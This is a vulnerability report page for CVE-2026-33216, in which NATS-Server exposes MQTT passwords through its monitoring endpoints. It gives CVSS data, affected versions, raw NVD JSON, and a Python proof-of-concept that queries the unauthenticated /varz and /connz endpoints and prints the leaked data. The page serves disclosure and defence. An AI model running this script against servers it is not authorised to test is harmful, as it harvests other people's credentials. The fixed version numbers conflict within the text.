Security Vulnerability Report
中文
CVE-2026-33216 CVSS 8.6 HIGH

CVE-2026-33216

Published: 2026-03-25 20:16:32
Last Modified: 2026-03-26 17:14:04
Source: [email protected]

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, for MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints. Versions 2.11.14 and 2.12.6 contain a fix. As a workaround, ensure monitoring end-points are adequately secured. Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE
NATS-Server < 2.11.15
NATS-Server < 2.12.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # PoC for CVE-2026-33216: NATS-Server MQTT Password Leak # This script attempts to retrieve MQTT passwords from the monitoring endpoint. def check_vulnerability(target_url): # Common monitoring endpoints for NATS endpoints = ["/varz", "/connz", "/routez", "/gatewayz"] print(f"[*] Checking target: {target_url}") for endpoint in endpoints: try: url = f"{target_url.rstrip('/')}{endpoint}" # Send request without authentication (PR:N) response = requests.get(url, timeout=5) if response.status_code == 200: data = response.text # Check for presence of MQTT related data and potential password leaks # In vulnerable versions, passwords might appear in 'jwt' or user fields if "mqtt" in data.lower(): print(f"[+] Potential MQTT data found at {url}") print("[!] Review the following output for exposed passwords:") print(data[:500]) # Print snippet for analysis return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[-] No vulnerable endpoints exposed or no MQTT data found.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <http://target:port>") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33216", "sourceIdentifier": "[email protected]", "published": "2026-03-25T20:16:32.320", "lastModified": "2026-03-26T17:14:04.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, for MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints. Versions 2.11.14 and 2.12.6 contain a fix. As a workaround, ensure monitoring end-points are adequately secured. Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, para implementaciones de MQTT que utilizan códigos de usuario/contraseñas: las contraseñas de MQTT se clasifican incorrectamente como una declaración de identidad no autenticadora (JWT) y se exponen a través de los puntos finales de monitoreo. Las versiones 2.11.14 y 2.12.6 contienen una corrección. Como solución alternativa, asegúrese de que los puntos finales de monitoreo estén adecuadamente protegidos. La mejor práctica sigue siendo no exponer el punto final de monitoreo a Internet u otros usuarios de red no confiables."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-05.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/commit/b5b63cfc35a57075e09c1f57503d31721bed8099", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-v722-jcv5-w7mc", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.